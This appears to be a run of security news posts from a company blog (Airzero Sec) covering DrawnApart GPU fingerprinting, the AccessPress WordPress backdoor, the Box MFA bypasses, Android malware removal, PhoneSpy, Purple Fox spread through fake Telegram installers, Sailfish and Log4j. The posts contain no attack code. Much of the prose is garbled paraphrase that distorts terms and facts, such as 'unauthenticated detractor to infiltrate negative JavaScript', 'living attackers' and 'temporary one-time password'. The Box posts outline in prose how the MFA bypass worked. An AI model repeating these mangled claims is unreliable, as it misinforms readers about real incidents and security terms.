Airzero Sec

A group of researchers from French, Israeli, and Australian universities investigated the possibility of creating unique fingerprints from people's GPUs and using them for persistent web tracking.

The findings of their large-scale experiment, which involved 2,550 devices with 1,605 different CPU configurations, show that their technique, dubbed 'DrawnApart,' can increase the median tracking duration by 67 percent when compared to current state-of-the-art methods.

This is a serious issue for user privacy, which is currently protected by laws focusing on obtaining consent to activate website cookies.

Because of these laws, unscrupulous websites have begun to collect additional potential fingerprinting elements such as hardware configuration, operating system, timezones, screen resolution, language, fonts, and so on.

This unethical approach is still limited because these elements change frequently, and even when they are stable, they can only assign users to broad categories rather than creating a unique fingerprint.

Identical GPUs are being fingerprinted.

With the help of WebGL, the researchers considered the possibility of creating unique fingerprints based on the GPU (graphics processing unit) of the tracked systems (Web Graphics Library).

WebGL is a cross-platform API for rendering 3D graphics in browsers that are supported by all modern browsers. The DrawnApart tracking system can use this library to count the number and speed of execution units in the GPU, measure the time required to complete vertex renders, handle stall functions, and more.

To overcome the challenge of having random execution units handle the computations, DrawnApart uses short GLSL programmes executed by the target GPU as part of the vertex shader. As a result, workload distribution is predictable and standardized. The team created an on-screen measurement method that performs a small number of computationally intensive operations, as well as an off-screen measurement method that puts the GPU through a longer and less intensive test. This process generates traces made up of 176 measurements taken from 16 points, which are then used to create a fingerprint. Even when evaluating the individual raw traces visually, differences and distinct timing variations between devices can be observed.

The researchers also experimented with swapping out other hardware components on the machines to see if the traces could still be distinguished, and discovered that the fingerprints were solely dependent on the GPU.

Even if a set of integrated circuits is manufactured in the same way, has the same nominal computational power, a number of processing units, and exact same cores and architecture, each circuit is slightly different due to normal manufacturing variability.

In normal day-to-day operations, these distinctions are indistinguishable, but they can be useful in the context of a sophisticated tracking system like DrawnApart, which is specifically designed to trigger functional aspects that highlight them.

Implications and considerations

When DrawnApart is combined with cutting-edge tracking algorithms, the median tracking duration of a targeted user increases by 67%.

As shown in the diagram below, the standalone tracking algorithm can achieve an average tracking time of 17.5 days, but with GPU fingerprinting, this can be extended to 28 days.

Based on the testing conditions, the GPU operational temperature range is between 26.4 °C and 37 °C, with no voltage variations. Workload variations, GPU payloads from other web browser tabs, system restarts, and other runtime changes have no effect on DrawnApart. The next-generation GPU APIs that are currently in development, most notably WebGPU, include computing shaders in addition to the existing graphics pipeline. As a result, the upcoming API may introduce even more ways to fingerprint internet users, as well as much faster and more accurate methods. When the researchers tested compute shaders in the now-defunct WebGL 2.0, they discovered that DrawnApart achieved 98 percent classification accuracy in only 150 milliseconds, much faster than the 8 seconds required to collect fingerprinting data via the WebGL API.

"We believe that once the WebGPU API is widely available, a similar method can be developed. Before enabling accelerated compute APIs globally, the effects on user privacy should be considered "finalizes the research paper Attribute value changes, parallel execution prevention, script blocking, API blocking, and time measurement prevention are all potential countermeasures to this fingerprinting method.

Khronos Group, the developer of the WebGL API, has received the researchers' disclosure and formed a technical study group to discuss potential solutions with browser vendors and other stakeholders. If you have any doubts about the aforementioned issue, please contact us. Please do not hesitate to get in touch with us. Your digital partner will be Airzero Sec.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

In yet another software supply chain attack, dozens of WordPress themes and plugins hosted on a creator website were backdoored with hostile code in the foremost half of September 2021 with the intention of infecting additional sites.

The backdoor gave the attackers full administrative control over websites that used AccessPress Themes' 40 themes and 53 plugins, a Nepal-based company with over 360,000 active website installations.

"The infected extensions contained a dropper for a web shell, giving the attackers full access to the infected sites," security researchers from JetPack, a WordPress plugin suite developer, wrote in a report published this week. "The same extensions worked fine when downloaded or installed from the WordPress[.]org directory."

The vulnerability has been identified as CVE-2021-24867. In a separate analysis, website security platform Sucuri found that some of the infected websites discovered using this backdoor had spam payloads dating back almost three years, implying that the actors after the process were trading entrances to the places to operators of other spam campaigns.

Early this month, cybersecurity firm eSentire revealed how compromised WordPress websites belonging to legitimate businesses are used as a hotbed for malware delivery, serving an implant called GootLoader to easy users exploring for postnuptial or intellectual property agreements on search engines like Google.

Site owners who installed the plugins directly from AccessPress Themes' website are advised to upgrade to a safe version as soon as possible or replace it with the latest version from WordPress[.]org. Furthermore, it necessitates the deployment of a clean version of WordPress in order to undo the changes made during the backdoor installation.

The findings coincide with the disclosure by WordPress security company Wordfence of a now-patched cross-site scripting (XSS) vulnerability affecting a plugin called "WordPress Email Template Designer – WP HTML Mail" that is installed on over 20,000 websites.

The bug, identified as CVE-2022-0218, was rated 8.3 on the CVSS vulnerability scoring system and was addressed as part of updates released on January 13, 2022. (version 3.1).

"This flaw permitted an unauthenticated detractor to infiltrate negative JavaScript that would accomplish whenever a site manager accessed the template editor," explained Chloe Chamberland. "This vulnerability also allows them to modify the email template to include arbitrary data that could be used to launch a phishing attack against anyone who received emails from the compromised site."

According to data released this month by Risk Based Security, a whopping 2,240 security flaws were discovered and reported in third-party WordPress plugins by the end of 2021, a 142 percent increase from the previous year, when nearly 1,000 vulnerabilities were disclosed. A total of 10,359 WordPress plugin vulnerabilities have been discovered to date. If you have any reservations regarding the subject. Please do not hesitate to get in touch with us. Your digital partner will be Airzero Sec.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

Box has moved to patch a flaw in its SMS-based two-factor authentication (MFA), just weeks after its temporary one-time password (TOTP)-based MFA was discovered to be vulnerable as well.

Varonis Threat Labs detailed how the technique could allow an attacker to use stolen credentials to compromise an organization's Box account and exfiltrate sensitive data without access to the victim's phone in a technical blog post. "Once known, the vulnerability is extremely easy for an unsophisticated attacker to exploit," says Or Emanuel, head of Varonis Threat Labs.

SMS-based 2FA

Box, like many other applications, allows users who do not have Single Sign-On (SSO) to use a one-time passcode sent via SMS as a second authentication step.

When a user enters a username and password into Box's login form, Box stores a session cookie and redirects the user to enter either a temporary one-time password for use with an authenticator app or an SMS code to gain access to their Box.com account.

If the user does not go to the SMS verification form, no SMS message is sent, but a session cookie is generated – and a malicious actor.

Once the cookie is generated, the attacker can abandon the SMS-based MFA process and instead initiate the TOTP-based process by using the session cookie to post a factor ID and to the TOTP verification endpoint, they must send a code from their own Box account and authenticator app.

Box failed to validate whether the victim was enrolled in TOTP verification or that the authenticator app used belonged to the user who was logging in.

Coordinated disclosure

According to Emanuel, the disclosure was made through HackerOne, and Box responded quickly.

The report comes on the heels of Varonis' late-year discovery that Box's TOTP-based MFA was also vulnerable to exploitation.

To log in, users must first enter their email address and password, followed by a one-time password generated by their authenticator app. Varonis discovered, however, that the user did not have to be fully authenticated in order to remove a TOTP device from a user's account.

The researchers were able to successfully unenroll a user from MFA after providing a username and password but before providing the second factor as a result of this. They could then log in without using MFA and gain full access to the user's Box account.

According to Emanuel, the team is currently testing other MFA implementations. "We believe it is extremely widespread because there are countless SaaS applications, the majority of which have their own MFA implementation." "The more we look, the more flaws we discover," he claims.

"There are numerous failure points, not just the vendor's MFA code." SMS messages, for example, can be intercepted in a variety of ways, including SIM jacking and port-out fraud. Authenticator apps may contain flaws. There are also backdoors into SaaS apps that completely bypass the login process, such as session hijacking."

If you have any questions about this issue, please contact us via the email address provided. Your security partner will be Airzero sec.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

Malware can infect your Android phone in the same way that it can infect your computer. It slows down your system and causes glitches that make it difficult to use your phone. To protect your phone and yourself, you must act quickly. There are steps you can take to remove malware and protect your phone in the future, whether you downloaded an infected app or visited a corrupted website.

How to Get Rid of Malware and Viruses?

The initial step is to locate the malware on your phone. We'll show you how to do it, and then we'll give you some protection options, as well as antivirus apps you can use to restore your phone's health and keep it safe in the future.

Step 1: Turn off the computer until you have determined the specifics.

Once you've determined that your phone has been infected with malware, hold the power button down and turn the phone off completely. It will not prevent the malware from causing damage, but it will prevent the problem from worsening and may halt ongoing malware attempts to access nearby networks.

Shutting down also gives you time to reflect and conduct research. Do you know which infected app installed malware on your device? Do you know what other software it may have downloaded without your permission? If not, switch to a different computer and look up your symptoms (along with any new apps you tried out) to narrow down the problem. You can't remove an app if you can't find it at the source of the problem.

Step 2: While working, switch to safe/emergency mode. When you restart your device and attempt to isolate the problematic app, go into safe mode first. This will help to limit the amount of damage the infected app can cause.

Step 3: To enter safe mode on most Android devices, hold down the power button for a few seconds while the device is turned on, then tap and hold the Power off option.

Step 4: This should bring up a few power options, including a Reboot to safe mode option.

Select this mode and wait for your phone to reboot before proceeding. If you can't find a safe mode, use aeroplane mode to disconnect your device from all networks. That option is usually at the top of your notifications shade.

Note: If you can't figure out what's causing your malware problem after downloading a security app, don't tinker. Consult a professional to determine whether you should wipe your phone. This is a good strategy if ransomware, which is becoming more common, takes control of your phone and prevents you from doing anything.

Step 5: Navigate to Settings and locate the app.

On your Android device, go to Settings. Settings are typically represented by a gear-shaped icon, but this varies depending on your themes and arrangement: If you're having trouble finding it, look for it.

Step 6: In Settings, scroll down to the Apps section and click it. Look for a list of all your current apps — you may need to select App Manager to see the entire list.

Step 7: Once there, scroll down until you find the infected app that is causing your issues.

Step 8: Select the app, and you should be able to uninstall, force close, or force stop it (often, you cannot uninstall core apps, only disable them, but these apps are unlikely to be the problem).

Step 9: Select Uninstall to delete the infected app and anything else suspicious, and your Android device should remove the app in question. It's also a good idea to go through your app list and uninstall any suspicious downloads — if you haven't looked through this list before, you might be surprised at some of the strange things your device has on it.

What should you do if you are unable to uninstall the app?

In some cases, you will be unable to uninstall the problematic app. In fact, the option to delete may not exist at all. Instead, you'll see Disable on the menu, and that'll be the end of it. An app with superpowers (and potentially dangerous malware or ransomware) can gain access to your administrator settings. The app may have granted itself administrative privileges in order to protect itself from deletion.

Step 1: Simply return to the original Settings menu and scroll down to Lock Screen and Security (or a similar corresponding section).

Step 2: In the Security menu, look for a tab labeled Phone (Device) Administrators. Keep in mind that depending on the hierarchy of your security menu, you may need to go to Other security settings first. You should be able to find the setting that allows the malware to camp out in Phone Administrators.

Step 3: After that, all you have to do is tweak the settings and you can finally delete the app.

Get some Malware Protection

It's a good idea to give each Android device plenty of security and malware protection, and it's especially important to install antivirus software if you've had bad luck with questionable apps in the past. After you have manually deleted the app that is causing you problems, you will need to increase the overall security of your phone.

Fortunately, there are plenty of security apps available. Rather than downloading multiple apps that only do one or two things, look for a security app that has all of the features you need in one. A good security app will be able to delete junk or spam files, scan for viruses, and keep your data safe. Some apps have options to automatically delete any questionable software.

We recommend Safe Security, AVG Antivirus, or Avast Antivirus, all of which can be downloaded from the Google Play Store. In addition, we have a comprehensive guide to Android security and antivirus recommendations. You'll notice that your device performs better overall once you've downloaded proper malware protection.

Remember to always keep your software up to date with the latest version. Your devices should do this automatically, but you can manually check for updates on a regular basis. Your phone will be far more vulnerable to attack if you do not perform regular software updates. If you have any doubt about the topic. Please contact us. Airzero sec will be your security partner.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

PhoneSpy can steal important data, obtain the full list of installed apps, record audio, and video in real-time, extract device information, and even grant remote access to the device. In 23 apps, malware that spies on Android devices have been discovered. This Android malware, known as PhoneSpy, has been active in the US and Korean markets. One ray of hope is that none of the infected apps were available on Google Play.

PhoneSpy can steal critical data such as images, call logs, contacts, and messages, as well as get the full list of installed apps, record audio and video in real-time "The app has the ability to uninstall any user-installed applications, including mobile security apps." The malicious actors have real-time access to the device's precise location, all without the victim's knowledge. "The spyware also allows the threat actor to use phishing pages to harvest Facebook, Instagram, Google, and Kakao Talk credentials," the agency said in a statement.

To stay safe from such malware, users should never install apps from untrusted sources on their phones. In addition, never click on links or download attachments sent in suspicious emails or messages.

Airzero Sec is at the cutting edge of security technology, supporting you in conquering the most complex security challenges. If you have any questions, please contact us.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

On infected PCs, Trojanized Telegram chat app installers are being used to disseminate the Windows-based Purple Fox backdoor.

According to recent research from Minerva Labs, the attack differs from other types of intrusions that often exploit legitimate software to deliver harmful payloads.

"By separating the attack into considerable little files, the majority of which had very low detection speeds by engines, with the last stage leading to Purple Fox rootkit infection," said researcher Natalie Zargarov.

Purple Fox was identified in 2018 and possesses rootkit characteristics, allowing it to elude detection by being planted outside the reach of security solutions. In a March 2021 study, Guardicore described its worm-like propagation function, which allows the backdoor to proliferate faster.

Then, in October 2021, Trend Micro researchers uncovered FoxSocket, a.NET implant used in conjunction with Purple Fox to interact with its command-and-control (C2) servers using WebSockets for a more secure method of communication.

The researchers concluded, "Purple Fox stays on impacted systems longer and delivers extra payloads."

Finally, in December 2021, Trend Micro revealed the Purple Fox infection chain's later stages, which include targeting SQL databases by inserting a malicious SQL common language runtime (CLR) module to gain a steady and stealthier performance and eventually abusing SQL servers for illicit cryptocurrency mining.

Minerva identified a new attack chain that starts with a Telegram installer file, an AutoIt script that drops a legal Telegram installer, and a malicious downloader called "TextInputh.exe," which is used to download next-stage malware from the C2 server.

Following that, the downloaded files disable antivirus engine processes before moving on to the last stage, which involves downloading and executing the Purple Fox rootkit from a now-defunct remote server.

"We detected a huge number of malware installers that used the same attack chain to deploy the same Purple Fox rootkit version," Zargarov added.”The attack's beauty is that each stage is segregated into its own file, leaving it unusable without the complete file set."

Every business faces daunting challenges when it comes to protecting its assets:

• Threats that are new and evolving

• Regulations governing privacy and compliance

• The increased risk associated with digital transformation

With hundreds of point-solution dealers and cheap, inadequate tools, companies face a cyber security dilemma that can only be solved by a truly integrated cyber defense.

Airzero Sec is driving innovation to assist you in overcoming your most difficult challenges. If you have any questions about the fake telegram messenger app. Contact us through the given email.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

A team of researchers from the University of California, Santa Barbara, has demonstrated a "scalable technique" for vetting smart contracts and mitigating state-inconsistency bugs, uncovering 47 zero-day vulnerabilities on the Ethereum blockchain in the process.

Smart contracts are programs that are stored on the blockchain and are automatically executed when predetermined conditions are met based on the agreement's encoded terms. They enable anonymous parties to carry out trusted transactions and agreements without the need for a central authority.

In other words, the code is intended to be the final arbiter of "the deal" that it represents, with the program controlling all aspects of execution and providing an immutable evidentiary audit trail of transactions that are both trackable and irreversible.

This also implies that vulnerabilities in the code could result in significant losses, as evidenced by hacks against the DAO and, more recently, MonoX, in which adversaries exploited loopholes to illicitly syphon funds, a scenario that could have disastrous consequences given the burgeoning adoption of smart contracts in recent years.

"Because smart contracts are not easily upgradeable, auditing the contract's source prior to deployment and deploying a bug-free contract is even more important than in the case of traditional software," the researchers wrote in a paper.

Enter Sailfish, which aims to detect state inconsistency vulnerabilities in smart contracts that allow an attacker to tamper with transaction execution order or take over control flow within a single transaction (i.e., reentrancy).

The tool operates as follows. Given a smart contract, Sailfish converts it into a dependency graph, which captures the control and data flow relations between storage variables and smart contract state-changing instructions, and uses it to identify potential flaws by defining hazardous access, which is implemented as graph queries to determine whether two different execution paths, at least one of which is a write operation, operate on the same storage variable.

The researchers tested Sailfish on 89,853 contracts obtained from Etherscan, discovering 47 zero-day vulnerabilities that could be exploited to drain Ether and even corrupt application-specific metadata.

This also includes a vulnerable contract implementing a housing tracker that could be abused in such a way that a homeowner could have multiple active listings. The study's findings will be presented at the IEEE Symposium on Security and Privacy (S&P) in May 2022.

This is not the first time that academics have been drawn to problematic smart contracts. In September 2020, Chinese researchers created a framework for categorizing known vulnerabilities in smart contracts, with the goal of providing a detection criterion for each bug.

Airzero Sec's cybersecurity experts have worked on a wide range of projects for a number of well-known companies for many years. Use our previous experience to your advantage, whether it's to assist you in getting there or to perform technical tests. If you have any doubts about the aforementioned issue, please contact us. Please do not hesitate to get in touch with us.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

Microsoft has issued a warning about continuous attempts by nation-state adversaries and commodity attackers to use security holes in the Log4j open-source logging platform to spread malware on vulnerable computers.

"Exploitation shots and testing have remained high over the closing weeks of December," according to revised guidance published earlier this week by Microsoft Threat Intelligence Center. "We've seen a number of living attackers incorporate these vulnerabilities into their existing malware kits and methods, ranging from coin miners to hands-on-keyboard attacks," says the researcher.

The Apache Software Foundation formally revealed the remote code execution (RCE) vulnerability in Apache Log4j 2, dubbed Log4Shell, on December 10, 2021, and it has since emerged as a new attack vector for a number of threat actors.

Four more vulnerabilities in the utility were discovered in the weeks after that — CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832 — allowing opportunistic bad actors to maintain persistent control over the compromised machines and mount an evolving collection of attacks going from cryptocurrency miners to ransomware.

Efforts are being made to circumvent string-matching detections by obfuscating the malicious HTTP requests staged to build a web request log using Log4j that utilizes JNDI to complete a submission to the attacker-controlled site, even as mass scanning attempts continue unabated.

"Rapid approval of the exposure into living botnets like Mirai, past efforts targeting susceptible Elasticsearch servers to deploy cryptocurrency miners, and activities distributing the Tsunami backdoor to Linux systems," according to Microsoft. Additional remote access toolkits and reverse shells, such as Meterpreter, Bladabindi (aka NjRAT), and habitsRAT, have been delivered via the Log4Shell vulnerability.

"Clients should consider the general availability of exploit code and scanning capabilities to be a simple and present threat to their environments at this time," MSTIC warned. "Because of the massive number of vulnerable software and services, as well as the rapid pace of progress, remediation is projected to take a long time, needing continued, long-term attention."

The news comes as the US Federal Trade Commission (FTC) issued a statement warning that it "intends to use its full legal authority to pursue companies that fail to take appropriate steps to safeguard customer data from exposure as a result of Log4j, or equivalent is known vulnerabilities in the future."

For many years, Airzero Sec's cybersecurity experts have worked on a variety of projects for a number of well-known companies. Take advantage of our previous experience, whether it's to aid you in getting there or to undertake technical tests. If you have any doubt about the above topic. Don’t hesitate to contact us. Airzero Cloud will be your digital companion.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/